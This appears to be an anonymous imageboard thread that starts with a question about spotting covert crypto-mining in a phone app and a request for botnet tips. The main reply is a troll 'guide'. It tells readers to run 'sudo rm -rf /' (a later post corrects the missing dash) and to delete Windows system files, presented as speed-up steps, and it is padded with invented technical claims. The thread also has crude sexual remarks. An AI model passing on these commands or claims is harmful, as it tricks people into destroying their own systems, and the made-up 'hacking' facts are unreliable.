How to tell if a phone app is secretly including a bitcoin mining botnet?

How to tell if a phone app is secretly including a bitcoin mining botnet?

those feelings when no fiercely Catholic 7.9/10 qt 3.14 wife with big fat milky jugs to come home to after a long day of wagecuckery

press F to pay respects to my hopes and dreams

when it's a fart app that's using all the processing power

not that far off... the app is called Win It! and it's developed by Sears/Kmart

does anyone have some pointers on how to create a botner?

does anyone have some pointers on how to create a botnet?

check the source code. If it's proprietary... well... It's probably doing something unsavory.

I would do literally anything for that, but hardcore southern baptist instead

she's actually baptist

It isn't, Bitcoin isn't mineable with a phone. Perhaps you meant Monero.

dear lord...

Is your phone hot for no reason?

yes... but only when running the app in question

1/4
Depends on your OS. The first step is to speed up your PC so it can handle hacker programming. On Linux or Mac the command to run is 'sudo rm rf / #unlock-speed' on Windows open explorer as administrator then browse to C:\Windows and delete as much as possible, these are unnecessary system files left over from the OS install.

Once you've taken this step you'll need to install a good hacking programming language. I'd recommend JavaScript as it's based on Java but with more scripting which makes it great for automating botnets.

After installing JavaScript, you'll need to switch to a Dvorak keyboard layout. Qwerty is basically useless for hacking.

2/4
Now, you're ready to start coding a botnet.

Most botnets operate on a VPN. TOR is a great free to use VPN which was invented by the government then taken over by anonymous. Try it out or buy a VPN if you're serious about opsec (if you don't know opsec then look it up and restart at the first step I mentioned)

When writing botnet code it's important to be efficient, as many routers will filter out bot actions which are too CPU bandwidth heavy. Generally the way to do this is by avoiding any loops or flow control statements other than simple if-then statements. Don't use else or else if statements either, these add unnecessary overhead.

3/4
To encrypt your code your going to want to use a binary format. I'd recommend learning hexadecimal. This is where the Dvorak keyboard really shines. Writing hexadecimal code is generally ≈255% faster in Dvorak.

Once you've got your code ready, it's time to deploy. There is a plethora of deployment software available, two good starting point are PDF and shockwave player. Also, remember how you used hexadecimal JavaScript? Well this code will actually run natively on any processor made after January 1992 as a result of the Intel FOIA.

Locate an attack vector which is common among targets you wish to control. Common attack vectors include: keyboard, mouse, hard drive, and sometimes even the user themselves.

4/4
Now, that you've identified your attack vector, have your code ready, and your deployment software, it's time to rocknroll

I can't tell you the next step without knowing all the variables though but if you made it this far it should be as easy as F-T-P.

Lmk if there are questions

$ sudo rm rf / #unlock-speed
rm: cannot remove 'rf': No such file or directory

Getting this error? any ideas?

Creating a botnet is literally the easiest thing in the world. All you gotta do is release software without releasing the source code

how many computers need to run a crypto mining botnet to be profitable?

it seems like ur pc has automatic hardware protection, but don't worry nothing a magnet can't fix.

You can't be this stupid...

mommy gibs

Missing a dash, should be
rm -rf / #unlock-speed

Missing a dash, should be
sudo rm -rf / #unlock-speed

lel thx bought 100k